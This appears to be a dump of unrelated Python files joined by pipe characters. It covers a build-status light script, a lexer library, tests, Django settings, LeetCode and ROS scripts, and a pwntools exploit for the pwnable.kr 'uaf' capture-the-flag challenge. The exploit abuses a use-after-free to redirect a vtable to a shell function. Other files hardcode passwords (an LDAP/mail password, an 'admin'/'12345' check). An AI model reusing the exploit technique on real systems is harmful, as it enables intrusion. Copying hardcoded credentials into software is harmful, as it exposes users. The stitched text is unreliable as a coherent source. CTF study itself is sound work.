if (username == "admin") and (password == "12345"):
print("Access granted")
|
# Python 2.7
import logging
import json
import socket
import subprocess
import os
from httplib import HTTPConnection
STATE = dict(Yellow="PORT11=0:NC PORT12=128:NC PORT13=0:NC",
Red="PORT11=0:NC PORT12=0:NC PORT13=128:NC",
Green="PORT11=128:NC PORT12=0:NC PORT13=0:NC",
Off="PORT11=0:NC PORT12=0:NC PORT13=0:NC",
All="PORT11=128:NC PORT12=128:NC PORT13=128:NC")
def set_command(color):
control_path = os.path.join(os.getcwd(), 'MP710.exe')
cmd = "%s CMD=100 PRG=15 %s" % (control_path, STATE[color])
p = subprocess.Popen(cmd, shell=True)
p.wait()
if __name__ == "__main__":
logging.basicConfig(filename='log_file.log', level=logging.DEBUG, filemode='w')
set_command('Yellow')
logging.debug("Start to validate...")
try:
connection = HTTPConnection('jenkins')
connection.request("GET", "/api/main_build_status/")
response = connection.getresponse()
data = response.read()
result = json.loads(data)
BUILD_RESULT = result.get('build_status')
TESTS_RESULT = result.get('functional_tests')
ENV_RESULT = result.get('main_env_status')
logging.debug("BUILD: %s" % BUILD_RESULT)
logging.debug("TEST: %s" % TESTS_RESULT)
logging.debug("ENV: %s" % ENV_RESULT)
if BUILD_RESULT == "FAILED":
set_command("Red")
logging.debug("Build is FAILED")
elif ENV_RESULT == "FAILED":
set_command("Red")
logging.debug("Env is FAILED")
elif BUILD_RESULT == "STARTED":
logging.debug("Build in progress")
elif BUILD_RESULT == "SUCCESS":
logging.debug("Build is OK.")
if TESTS_RESULT == "SUCCESS":
set_command("Green")
logging.debug("Functional Tests are OK.")
else:
set_command("Red")
logging.debug("Functional Tests are FAILED")
except socket.error:
set_command("Red")
logging.debug("Some problem with internet!")
|
from django.http import HttpResponse
class AppMaintainanceMiddleware(object):
def __init__(self,get_response):
self.get_response=get_response
def __call__(self,request):
return HttpResponse('<h1> currently application is under maintainance! <p style="color:red;">please try again later.!</p> thank you :)</h1>')
|
test_str = "Hey, I'm a string, and I have a lot of characters...cool!"
print (test_str)
print ("String length:", len(test_str)) |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
`nr.strex` String Processing Library
====================================
Strex is a simple library to tokenize and parse small or even
complex languages. It has been developed specifically for the
recursive decent parser technique, although it might work well
with other parsing techniques as well.
'''
import collections
import string
import re
import sys
__author__ = 'Niklas Rosenstein <rosensteinniklas(at)gmail.com>'
__version__ = '1.4.1'
eof = 'eof'
string_types = (str,) if sys.version_info[0] == 3 else (str, unicode)
Cursor = collections.namedtuple('Cursor', 'index lineno colno')
Token = collections.namedtuple('Token', 'type cursor value')
class Scanner(object):
''' This class is used to step through text character by character
and keep track of the line and column numbers of each passed
character. The Scanner will only tread line-feed as a newline.
@param text
The text to parse. Must be a `str` in Python 3 and may also be
a `unicode` object in Python 2.
@attr text
@attr index The index in the text.
@attr lineno The current line number.
@attr colno The current column number.
@property cursor The current `Cursor` value.
@property char The current character, or an empty string/unicode
if the end of the text was reached. '''
def __init__(self, text):
if not isinstance(text, string_types):
raise TypeError('expected str or unicode', type(text))
super(Scanner, self).__init__()
self.text = text
self.index = 0
self.lineno = 1
self.colno = 0
def __repr__(self):
return '<Scanner at {0}:{0}>'.format(self.lineno, self.colno)
def __bool__(self):
return self.index < len(self.text)
__nonzero__ = __bool__ # Python 2
@property
def cursor(self):
return Cursor(self.index, self.lineno, self.colno)
@property
def char(self):
if self.index >= 0 and self.index < len(self.text):
return self.text[self.index]
else:
return type(self.text)()
def next(self):
''' Move on to the next character in the scanned text. '''
char = self.char
if char == '\n':
self.lineno += 1
self.colno = 0
else:
self.colno += 1
self.index += 1
def next_get(self):
''' Like `next()` but returns the new character. '''
self.next()
return self.char
def restore(self, cursor):
''' Moves the scanner back (or forward) to the specified cursor. '''
if not isinstance(cursor, Cursor):
raise TypeError('expected Cursor object', type(cursor))
self.index, self.lineno, self.colno = cursor
def readline(scanner):
''' Reads a full line from the *scanner* and returns it. This is
fast over using `Scanner.next()` to the line-feed. The resulting
string contains the line-feed character if present. '''
start = end = scanner.index
while end < len(scanner.text):
if scanner.text[end] == '\n':
end += 1
break
end += 1
result = scanner.text[start:end]
scanner.index = end
if result.endswith('\n'):
scanner.colno = 0
scanner.lineno += 1
else:
scanner.colno += end - start
return result
def match(scanner, regex, flags=0):
''' Matches the specified *regex* from the current character of the
*scanner* and returns a match object or None if it didn't match. The
Scanners column and line numbers are updated respectively. '''
if isinstance(regex, str):
regex = re.compile(regex, flags)
match = regex.match(scanner.text, scanner.index)
if not match:
return None
start, end = match.start(), match.end()
lines = scanner.text.count('\n', start, end)
scanner.index = end
if lines:
scanner.colno = end - scanner.text.rfind('\n', start, end) - 1
scanner.lineno += lines
else:
scanner.colno += end - start
return match
class Lexer(object):
''' This class is used to split text into `Token`s using a
`Scanner` and a list of `Rule`s. If *raise_invalid* is True, it
raises an `TokenizationError` instead of yielding an invalid
`Token` object.
@param scanner The `Scanner` to use for lexing.
@param rules A list of `Rule` objects.
@param raise_invalid True if an exception should be raised when
the stream can not be tokenized, False if it should just yield
an invalid token and proceed with the next character.
@attr scanner
@attr rules
@attr rules_map A dictionary mapping the rule name to the rule
object. This is automatically built when the Lexer is created.
If the `rules` are updated in the lexer directly, `update()`
must be called.
@attr skippable_rules A list of skippable rules built from the
`rules` list. `update()` must be called if any of the rules
or rules list are modified.
@attr raise_invalid
@attr skip_rules A set of rule type IDs that will automatically
be skipped by the `next()` method.
@attr token The current `Token`. After the Lexer is created and
the `next()` method has not been called, the value of this
attribute is None. At the end of the input, the token is of
type `eof`.
'''
def __init__(self, scanner, rules=None, raise_invalid=True):
super(Lexer, self).__init__()
self.scanner = scanner
self.rules = list(rules) if rules else []
self.update()
self.raise_invalid = raise_invalid
self.token = None
def __repr__(self):
ctok = self.token.type if self.token else None
return '<Lexer with current token {0!r}>'.format(ctok)
def __iter__(self):
if not self.token:
self.next()
while not self.token.type == eof:
yield self.token
self.next()
def __bool__(self):
if self.token and self.token.type == eof:
return False
return True
__nonzero__ = __bool__ # Python 2
def update(self):
''' Updates the `rules_map` dictionary and `skippable_rules` list
based on the `rules` list.
Raises:
ValueError: if a rule name is duplicate
TypeError: if an item in the `rules` list is not a rule. '''
self.rules_map = {}
self.skippable_rules = []
for rule in self.rules:
if not isinstance(rule, Rule):
raise TypeError('item must be Rule instance', type(rule))
if rule.name in self.rules_map:
raise ValueError('duplicate rule name', rule.name)
self.rules_map[rule.name] = rule
if rule.skip:
self.skippable_rules.append(rule)
def expect(self, *names):
''' Checks if the _current_ token matches one of the specified
token type names and raises `UnexpectedTokenError` if it does not. '''
if not names:
return
if not self.token or self.token.type not in names:
raise UnexpectedTokenError(names, self.token)
def accept(self, *names, **kwargs):
''' Extracts a token of one of the specified rule names and doesn't
error if unsuccessful. Skippable tokens might still be skipped by
this method.
Raises:
ValueError: if a rule with the specified name doesn't exist. '''
return self.next(*names, as_accept=True, **kwargs)
def next(self, *expectation, **kwargs):
''' Parse the next token from the input and return it. If
`raise_invalid` is True, this method can raise `TokenizationError`.
The new token can also be accessed from the `token` attribute
after the method was called.
If one or more arguments are specified, they must be rule names
that are to be expected at the current position. They will be
attempted to be matched first (in the specicied order). If the
expectation could not be met, a `UnexpectedTokenError` is raised.
An expected Token will not be skipped, even if its rule says so.
Arguments:
\*expectation: The name of one or more rules that are expected
from the current context of the parser. If empty, the first
matching token of all rules will be returned. Skippable tokens
will always be skipped unless specified as argument.
as_accept=False: If passed True, this method behaves
the same as the `accept()` method.
weighted=False: If passed True, the *\*expectation* tokens
are checked before the default token order.
Raises:
ValueError: if an expectation doesn't match with a rule name.
UnexpectedTokenError: if an expectation is given and the
expectation wasn't fulfilled.
TokenizationError: if a token could not be generated from
the current position of the Scanner and `raise_invalid`
is True.
'''
as_accept = kwargs.pop('as_accept', False)
weighted = kwargs.pop('weighted', False)
for key in kwargs:
raise TypeError('unexpected keyword argument {0!r}'.format(key))
if self.token and self.token.type == eof:
if not as_accept and expectation and eof not in expectation:
raise UnexpectedTokenError(expectation, self.token)
elif as_accept and eof in expectation:
return self.token
elif as_accept:
return None
return self.token
token = None
while token is None:
# Stop if we reached the end of the input.
cursor = self.scanner.cursor
if not self.scanner:
token = Token(eof, cursor, None)
break
value = None
# Try to match the expected tokens.
if weighted:
for rule_name in expectation:
if rule_name == eof:
continue
rule = self.rules_map.get(rule_name)
if rule is None:
raise ValueError('unknown rule', rule_name)
value = rule.tokenize(self.scanner)
if value:
break
self.scanner.restore(cursor)
# Match the rest of the rules, but only if we're not acting
# like the accept() method that doesn't need the next token
# for raising an UnexpectedTokenError.
if not value:
if as_accept and weighted:
# Check only skippable rules if we're only trying to accept
# a certain token type and may consume any skippable tokens
# until then.
check_rules = self.skippable_rules
else:
check_rules = self.rules
for rule in check_rules:
if weighted and expectation and rule.name in expectation:
# Skip rules that we already tried.
continue
value = rule.tokenize(self.scanner)
if value:
break
self.scanner.restore(cursor)
if not value:
if as_accept:
return None
token = Token(None, cursor, self.scanner.char)
else:
assert rule, "we should have a rule by now"
if type(value) is not Token:
value = Token(rule.name, cursor, value)
token = value
expected = rule.name in expectation
if not expected and rule.skip:
# If we didn't expect this rule to match, and if its skippable,
# just skip it. :-)
token = None
elif not expected and as_accept:
# If we didn't expect this rule to match but are just accepting
# instead of expecting, restore to the original location and stop.
self.scanner.restore(cursor)
return None
self.token = token
if as_accept and token and token.type == eof:
if eof in expectation:
return token
return None
if token.type is None:
raise TokenizationError(token)
if not as_accept and expectation and token.type not in expectation:
raise UnexpectedTokenError(expectation, token)
assert not as_accept or (token and token.type in expectation)
return token
class Rule(object):
''' Base class for rule objects that are capable of extracting a
`Token` from the current position of a `Scanner`. '''
def __init__(self, name, skip=False):
super(Rule, self).__init__()
self.name = name
self.skip = skip
def tokenize(self, scanner):
''' Attempt to extract a token from the position of the *scanner*
and return it. If a non-`Token` instance is returned, it will be
used as the tokens value. Any value that evaluates to False will
make the Lexer assume that the rule couldn't capture a Token.
The `Token.value` must not necessarily be a string though, it can
be any data type or even a complex datatype, only the user must
know about it and handle the tokens special. '''
raise NotImplementedError
class Regex(Rule):
''' A rule to match a regular expression. The `Token` generated by
this rule contains the match object as its value. '''
def __init__(self, name, regex, flags=0, skip=False):
super(Regex, self).__init__(name, skip)
if isinstance(regex, string_types):
regex = re.compile(regex, flags)
self.regex = regex
def tokenize(self, scanner):
result = match(scanner, self.regex)
if result is None or result.start() == result.end():
return None
return result
class Keyword(Rule):
''' This rule matches an exact string (optionally case insensitive)
from the scanners current position. '''
def __init__(self, name, string, case_sensitive=True, skip=False):
super(Keyword, self).__init__(name, skip)
self.string = string
self.case_sensitive = case_sensitive
def tokenize(self, scanner):
string = self.string if self.case_sensitive else self.string.lower()
char = scanner.char
result = type(char)()
for other_char in string:
if not self.case_sensitive:
char = char.lower()
if char != other_char:
return None
result += char
char = scanner.next_get()
return result
class Charset(Rule):
''' This rule consumes all characters of a given set. It can be
specified to only match at a specific column number of the scanner.
This is useful to create a separate indentation token type apart
from the typical whitespace token. '''
def __init__(self, name, charset, at_column=-1, skip=False):
super(Charset, self).__init__(name, skip)
self.charset = frozenset(charset)
self.at_column = at_column
def tokenize(self, scanner):
if self.at_column >= 0 and self.at_column != scanner.colno:
return None
char = scanner.char
result = type(char)()
while char and char in self.charset:
result += char
char = scanner.next_get()
return result
class TokenizationError(Exception):
''' This exception is raised if the stream can not be tokenized
at a given position. The `Token` object that an object is initialized
with is an invalid token with the cursor position and current scanner
character as its value. '''
def __init__(self, token):
if type(token) is not Token:
raise TypeError('expected Token object', type(token))
if token.type is not None:
raise ValueError('can not be raised with a valid token')
self.token = token
def __str__(self):
message = 'could not tokenize stream at {0}:{1}:{2!r}'.format(
self.token.cursor.lineno, self.token.cursor.colno, self.token.value)
return message
class UnexpectedTokenError(Exception):
''' This exception is raised when the `Lexer.next()` method was given
one or more expected token types but the extracted token didn't match
the expected types. '''
def __init__(self, expectation, token):
if not isinstance(expectation, (list, tuple)):
message = 'expectation must be a list/tuple of rule names'
raise TypeError(message, type(expectation))
if len(expectation) < 1:
raise ValueError('expectation must contain at least one item')
if type(token) is not Token:
raise TypeError('token must be Token object', type(token))
if token.type is None:
raise ValueError('can not be raised with an invalid token')
self.expectation = expectation
self.token = token
def __str__(self):
message = 'expected token '.format(self.token.cursor.lineno, self.token.cursor.colno)
if len(self.expectation) == 1:
message += '"' + self.expectation[0] + '"'
else:
message += '{' + ','.join(map(str, self.expectation)) + '}'
return message + ', got "{0}" instead (value={1!r} at {2}:{3})'.format(
self.token.type, self.token.value, self.token.cursor.lineno,
self.token.cursor.colno)
|
import numpy as np
from . import process_image as module
def test_get_ROI_statistics():
# fmt: off
mock_ROI = np.array([
[[1, 10, 100], [2, 20, 200]],
[[3, 30, 300], [4, 40, 400]]
])
# fmt: on
actual = module.get_ROI_statistics(mock_ROI)
expected = {
"r_msorm": 2.5,
"g_msorm": 25.0,
"b_msorm": 250,
"r_cv": 1.118033988749895 / 2.5,
"g_cv": 11.180339887498949 / 25.0,
"b_cv": 111.80339887498948 / 250.0,
"r_mean": 2.5,
"g_mean": 25.0,
"b_mean": 250.0,
"r_outlier_warning": False,
"g_outlier_warning": False,
"b_outlier_warning": False,
"r_median": 2.5,
"g_median": 25.0,
"b_median": 250.0,
"r_min": 1,
"g_min": 10,
"b_min": 100,
"r_max": 4,
"g_max": 40,
"b_max": 400,
"r_stdev": 1.118033988749895,
"g_stdev": 11.180339887498949,
"b_stdev": 111.80339887498948,
"r_percentile_99": 3.9699999999999998,
"g_percentile_99": 39.699999999999996,
"b_percentile_99": 396.99999999999994,
"r_percentile_95": 3.8499999999999996,
"g_percentile_95": 38.5,
"b_percentile_95": 385.0,
"r_percentile_90": 3.7,
"g_percentile_90": 37.0,
"b_percentile_90": 370.0,
"r_percentile_75": 3.25,
"g_percentile_75": 32.5,
"b_percentile_75": 325.0,
"r_percentile_50": 2.5,
"g_percentile_50": 25.0,
"b_percentile_50": 250.0,
"r_percentile_25": 1.75,
"g_percentile_25": 17.5,
"b_percentile_25": 175.0,
}
assert actual == expected
|
# -*- coding: utf-8 -*-
# author: kiven
import os
DEBUG = True
TIME_ZONE = 'Asia/Shanghai'
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, '../omsBackend.db'),
}
}
# 开启ldap认证,不开启就注释下面一行
# AUTHENTICATION_BACKENDS = ("django_python3_ldap.auth.LDAPBackend",)
LDAP_AUTH_URL = "ldap://192.168.6.99:389"
LDAP_AUTH_SEARCH_BASE = "ou=AllUser,dc=oms,dc=com"
LDAP_AUTH_CONNECTION_USERNAME = r'oms\admin'
LDAP_AUTH_CONNECTION_PASSWORD = r'jjyy'
# email账号
MAIL_ACOUNT = {
"mail_host": "mail@oms.com",
"mail_user": "admin@oms.com",
"mail_pass": "jjyy",
"mail_postfix": "oms.com",
}
# skype账号
#from skpy import Skype
# SK_ACOUNT = {
# 'sk_user': 'admin@oms.com',
# 'sk_pass': 'jjyy'
# }
# SK = Skype(SK_ACOUNT["sk_user"], SK_ACOUNT["sk_pass"])
SK = 'skype'
REDIS_URL = 'redis://127.0.0.1:6379/'
# celery配置
CELERY_BROKER_URL = REDIS_URL + '0'
# celery结果返回,可用于跟踪结果
CELERY_RESULT_BACKEND = 'django-db'
# celery内容等消息的格式设置
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
# celery时区设置,使用settings中TIME_ZONE同样的时区
CELERY_TIMEZONE = TIME_ZONE
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": REDIS_URL + '1',
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
|
#!/usr/bin/env python3
import pwn
"""
Idea:
1. Need to delete the two instances by sending "3\n"
2. Need to feed in data through a file ./uaf <length> <file-with-length-data> and by sending "2\n"
such that the virtual table will point to a table containg the function named 'give_shell'.
But do we need to know all about how malloc and free are used to make this work?
The memory is probably added to a free-list and as such we should request memory
of the same size as the allocated classes.
3. Use the instances by sending "1\n"
At the moment introduce() is being called, rax contains the ptr to man.
At offset 8, the function for introduce() is loaded.
Thus we need to point to a place where at +8 the address of give_shell is located.
0x401570 contains the virtual table for Man, and the address of introduce is located at +8.
At +0 contains the address of give_shell. Thus if we use 0x401570-8 = 0x401568, then
+8 will contain give_shell.
We need to add our payload two times, since else only the woman instance is overwritten, and
calling man will crash.
"""
pwn.context.terminal = ["tmux", "splitw", "-h"]
exe = pwn.context.binary = pwn.ELF('./uaf')
random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10)
size_of_new = 8
payload_length = size_of_new
address_of_virtual_address_table = 0x401570
payload = pwn.p64(address_of_virtual_address_table - 8) + b'a' * (size_of_new - 8)
pwn.debug(pwn.hexdump(payload))
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
pwn.write('/tmp/payload', payload)
p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'], gdbscript=gdbscript)
elif pwn.args.LOCAL:
pwn.write('/tmp/payload', payload)
p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
io.upload_data(payload, random_file)
p = io.process(["./uaf", str(payload_length), random_file])
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('2')
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('1')
p.interactive()
|
class Solution(object):
def findDiagonalOrder(self, matrix):
if not matrix or not matrix[0]:
return []
result = []
N = len(matrix)
M = len(matrix[0])
#Iterate over heads
for d in range(M + N - 1):
inter = []
if d < M:
row = 0
col = d
else:
row = d - M + 1
col = M - 1
#Diagonal Traversal
while row < N and col > -1:
inter.append(matrix[row][col])
row += 1
col -= 1
if d % 2 == 0:
inter.reverse()
result += inter
else:
result += inter
return result
class Solution(object):
def findDiagonalOrder(self, matrix):
res = []
if not matrix:
return
m = len(matrix)
n = len(matrix[0])
for i in range(n):
j = 0
new = []
rev = False
if i%2 == 0:
rev = True
while 0<=j<m and 0<=i<n:
new.append(matrix[j][i])
j += 1
i -= 1
if rev == True:
res += new[::-1]
else:
res += new
for i in range(1,m):
j = n-1
new = []
rev = False
if n%2 !=0 and i%2 == 0:
rev = True
if n%2 ==0 and i%2 != 0:
rev = True
while 0<=j<n and 0<=i<m:
new.append(matrix[i][j])
j -= 1
i += 1
if rev == True:
res += new[::-1]
else:
res += new
return res |
../numpy/stats.py |
import numpy as np
from sklearn import linear_model
import pickle
import definitions
import os
from wsdm.ts.features import word2VecFeature
from wsdm.ts.helpers.regression import regression_utils
def get_data_and_labels(inputType):
if inputType == definitions.TYPE_NATIONALITY:
filename = os.path.join(definitions.TRAINING_DIR, "custom_nationality.train")
elif inputType == definitions.TYPE_PROFESSION:
filename = os.path.join(definitions.TRAINING_DIR, "custom_profession.train")
data = []
labels = []
with open(filename, encoding='utf8', mode='r') as fr:
for line in fr:
splitted = line.rstrip().split('\t')
assert len(splitted) == 3, "Invalid input row"
person = splitted[0]
term = splitted[1]
score = float(splitted[2])
data.append(regression_utils.get_features_values(person, term, inputType, word2VecFeature))
labels.append(score)
return np.array(data), np.array(labels)
def train_and_save(inputType):
if inputType == definitions.TYPE_NATIONALITY:
filename = definitions.REGRESSION_MODEL_NATIONALITY_PATH
elif inputType == definitions.TYPE_PROFESSION:
filename = definitions.REGRESSION_MODEL_PROFESSION_PATH
data, labels = get_data_and_labels(inputType)
log_model = linear_model.LinearRegression(normalize=True)
log_model.fit(data, labels)
pickle.dump(log_model, open(filename, 'wb'))
if __name__ == '__main__':
word2VecFeature.load_module()
train_and_save(definitions.TYPE_NATIONALITY)
train_and_save(definitions.TYPE_PROFESSION) |
import dash_bootstrap_components as dbc
breadcrumb = dbc.Breadcrumb(
items=[
{"label": "Docs", "href": "/docs", "external_link": True},
{
"label": "Components",
"href": "/docs/components",
"external_link": True,
},
{"label": "Breadcrumb", "active": True},
],
)
|
from backpack.core.derivatives.batchnorm1d import BatchNorm1dDerivatives
from .base import GradBaseModule
class GradBatchNorm1d(GradBaseModule):
def __init__(self):
super().__init__(
derivatives=BatchNorm1dDerivatives(), params=["bias", "weight"]
)
|
#!/usr/bin/env python
import cProfile
import uproot
import awkward as ak
import pandas as pd
import argparse
import fastjet as fj
import fjext
import tqdm
class ALICEDataConfig:
event_tree_name = "PWGHF_TreeCreator/tree_event_char"
track_tree_name = "PWGHF_TreeCreator/tree_Particle"
def __init__(self) -> None:
pass
# def make_df(df):
# d = dict()
# # d["particles"] = fjext.vectorize_pt_eta_phi(df['ParticlePt'].values, df['ParticleEta'].values, df['ParticlePhi'].values)
# d["parts"] = []
# for i in range(len(df['ParticlePt'].values)):
# d["parts"].append((df['ParticlePt'].values[i],
# df['ParticleEta'].values[i],
# df['ParticlePhi'].values[i]))
# for dn in df.columns:
# if 'Particle' in dn:
# continue
# d[dn] = df[dn].values[0]
# return pd.DataFrame(d)
def make_df_not(df, dfout, args):
d = dict()
for dn in df.columns:
if 'Particle' in dn:
d[dn] = df[dn].values
else:
d[dn] = df[dn].values[0]
# print(d)
if dfout is None:
dfout = pd.DataFrame(d)
return dfout
else:
dfout = dfout.append(pd.DataFrame(d))
return dfout
def make_df(df, pbar):
d = dict()
for dn in df.columns:
if "run_number" in dn:
continue
if "ev_id" in dn:
continue
if 'Particle' in dn:
d[dn] = df[dn].values
# print(dn, d[dn])
else:
d[dn] = df[dn].values[0]
# print(dn, d[dn])
dfout = pd.DataFrame(d)
pbar.update(1)
return dfout
def process_event(df, args, pbar):
# fjparts = fjext.vectorize_pt_eta_phi(df['ParticlePt'].values, df['ParticleEta'].values, df['ParticlePhi'].values)
# jet_def = fj.JetDefinition(fj.antikt_algorithm, 0.4)
# jet_area_def = fj.AreaDefinition(fj.active_area_explicit_ghosts, fj.GhostedAreaSpec(1.0))
# particle_selector = fj.SelectorPtMin(0.15) & fj.SelectorAbsRapMax(1.0)
# fj_particles_selected = particle_selector(fjparts)
# cs = fj.ClusterSequenceArea(fj_particles_selected, jet_def, jet_area_def)
# jets = fj.sorted_by_pt(cs.inclusive_jets())
# if args.debug:
# print('njets: ', len(jets), 'cent: ', df['centrality'].values[0], 'nparts: ', len(fjparts))
pbar.update(1)
# def analyze_df(df):
# for index, row in df:
# process_event(DataFrame(row))
def convert(args):
with uproot.open(args.input)[ALICEDataConfig.event_tree_name] as event_tree:
event_tree.show()
print(event_tree.branches)
#print(event_tree.arrays)
event_df_orig = event_tree.arrays(library="pd")
event_df = event_df_orig.query('is_ev_rej == 0')
event_df.reset_index(drop=True)
print(event_df)
with uproot.open(args.input)[ALICEDataConfig.track_tree_name] as track_tree:
track_tree.show()
track_df_orig = track_tree.arrays(library="pd")
# Merge event info into track tree
track_df = pd.merge(track_df_orig, event_df, on=['run_number', 'ev_id'])
track_df.reset_index(drop=True)
# (i) Group the track dataframe by event
# track_df_grouped is a DataFrameGroupBy object with one track dataframe per event
# # (ii) Transform the DataFrameGroupBy object to a SeriesGroupBy of fastjet particles
# # df_events = track_df.groupby(['run_number', 'ev_id']).apply(make_df)
pbar = tqdm.tqdm()
gby = track_df.groupby(['run_number', 'ev_id'])
if args.read:
_df = gby.apply(process_event, args, pbar)
pbar.close()
else:
dfout = None
# dfout = gby.apply(make_df, dfout, args)
dfout = gby.apply(make_df, pbar)
pbar.close()
dfout.reset_index(drop=True)
if args.debug:
print('writing', args.input+'.h5')
dfout.to_hdf(args.input+'.h5', 'data', mode='a', complevel=9)
# dfout.to_hdf(args.input+'.h5', 'data', mode='a', complevel=9, format='fixed', data_columns=True)
def read(args):
df = pd.read_hdf(args.input, 'data')
pbar = tqdm.tqdm()
for rn, new_df in df.groupby(["run_number", "ev_id"]):
process_event(new_df, args, pbar)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='', required=True)
parser.add_argument('--mc', help="set if this is an MC file",
default=False, action="store_true")
parser.add_argument('--read', help="read instead of converting", default=False, action="store_true")
parser.add_argument('--debug', help="flag", default=False, action="store_true")
parser.add_argument('--profile', help="cProfile", default=False, action="store_true")
args = parser.parse_args()
if '.h5' in args.input:
if args.profile:
cProfile.run('read(args)')
else:
read(args)
else:
if args.profile:
cProfile.run('convert(args)')
else:
convert(args)
if __name__ == '__main__':
main()
|
import typing
from typing import TYPE_CHECKING
if TYPE_CHECKING: # pragma: no cover
from kerasltisubmission import AnyIDType
class KerasLTISubmissionBaseException(Exception):
pass
class KerasLTISubmissionBadModelException(KerasLTISubmissionBaseException):
pass
class KerasLTISubmissionInputException(KerasLTISubmissionBaseException):
def __init__(self, message: typing.Optional[str] = None) -> None:
super().__init__(message or "Exception while loading assignment input data")
class KerasLTISubmissionNoInputException(KerasLTISubmissionInputException):
def __init__(self, api_endpoint: str, assignment_id: "AnyIDType") -> None:
super().__init__(
f"The Provider at {api_endpoint} did not send any input matrices for assignment {assignment_id}"
)
self.api_endpoint = api_endpoint
self.assignment_id = assignment_id
class KerasLTISubmissionException(KerasLTISubmissionBaseException):
def __init__(self) -> None:
super().__init__("Exception while submitting predictions")
class KerasLTISubmissionInvalidSubmissionException(KerasLTISubmissionBaseException):
def __init__(self, predictions: typing.Dict[str, int]) -> None:
super().__init__(
f"Invalid predictions: {predictions}. Must be a non-empty mapping of hashes to classes"
)
self.predictions = predictions
class KerasLTISubmissionConnectionException(KerasLTISubmissionBaseException):
pass
class KerasLTISubmissionConnectionFailedException(
KerasLTISubmissionConnectionException
):
def __init__(self, api_endpoint: str, exc: Exception) -> None:
super().__init__(f"Failed to connect to provider at {api_endpoint}")
self.api_endpoint = api_endpoint
self.exc = exc
class KerasLTISubmissionBadResponseException(KerasLTISubmissionConnectionException):
def __init__(
self,
api_endpoint: str,
return_code: int,
assignment_id: "AnyIDType",
message: str,
) -> None:
super().__init__(
f"The provider at {api_endpoint} replied with bad status code {return_code} for assignment {assignment_id}: {message or 'No message'}"
)
self.api_endpoint = api_endpoint
self.return_code = return_code
self.message = message
|
#!/usr/bin/env python
# coding=utf-8
# Jesus Tordesillas, jtorde@mit.edu
# date: July 2020
import math
import os
import sys
import time
import rospy
from snapstack_msgs.msg import State
import subprocess
import rostopic
def waitUntilRoscoreIsRunning():
# https://github.com/ros-visualization/rqt_robot_plugins/blob/eb5a4f702b5b5c92b85aaf9055bf6319f42f4249/rqt_moveit/src/rqt_moveit/moveit_widget.py#L251
is_roscore_running=False;
while(is_roscore_running==False):
try:
rostopic.get_topic_class('/rosout')
is_roscore_running = True
except rostopic.ROSTopicIOException as e:
is_roscore_running = False
pass
print("Roscore is running!")
def launchCommandAndWaitUntilFinish(command):
session_name="untitled"
os.system("tmux kill-session -t" + session_name)
os.system("tmux new -d -s "+str(session_name)+" -x 300 -y 300")
commands=[command]
for i in range(len(commands)):
print('splitting ',i)
os.system('tmux split-window ; tmux select-layout tiled')
for i in range(len(commands)):
os.system('tmux send-keys -t '+str(session_name)+':0.'+str(i) +' "'+ commands[i]+'" '+' C-m')
print("Commands sent")
#waitUntilRoscoreIsRunning();
# os.system("rostopic echo /rosout |grep 'End of simulation' -m 1") #-m 1 will make it return as soon as it finds the first match.
output_string=""
while (output_string.find('data: True')==-1):
try: #['rostopic', 'echo', '/rosout', '|grep','simulation']
output_string =str(subprocess.check_output("rostopic echo /end_of_sim -n 1", shell=True)) #, '|grep', 'Results' , '-n', '1'
except:
print("An Error occurred")
time.sleep(3.0)
print("Sim has finished")
print("Killing the rest")
os.system(kill_all)
def writeToFile(sentence):
file_object = open('./results.txt', 'a')
file_object.write(sentence);
file_object.close()
if __name__ == '__main__':
kill_all="tmux kill-server & killall -9 gazebo & killall -9 gzserver & pkill -f swarm_traj_planner & killall -9 multi_robot_node & killall -9 gzclient & killall -9 roscore & killall -9 rosmaster & pkill faster_node & pkill -f dynamic_obstacles & pkill -f rosout & pkill -f behavior_selector_node & pkill -f rviz & pkill -f rqt_gui & pkill -f perfect_tracker & pkill -f faster_commands"
#make sure ROS (and related stuff) is not running
os.system(kill_all)
u_all=[2.0,3.0,4.0,5.0];
decentralized=["false","true"]
for i in range(len(decentralized)):
for j in range(len(u_all)):
command="roslaunch mpl_test_node test_multi_robot.launch rviz:=false u:="+str(u_all[j]) +" decentralized:="+str(decentralized[i]); #+" runsim:=false log:=false "; #>> $(rospack find swarm_planner)/scripts/results.txt
launchCommandAndWaitUntilFinish(command);
|
"""URLs for bcauth."""
from django.conf.urls import patterns, url
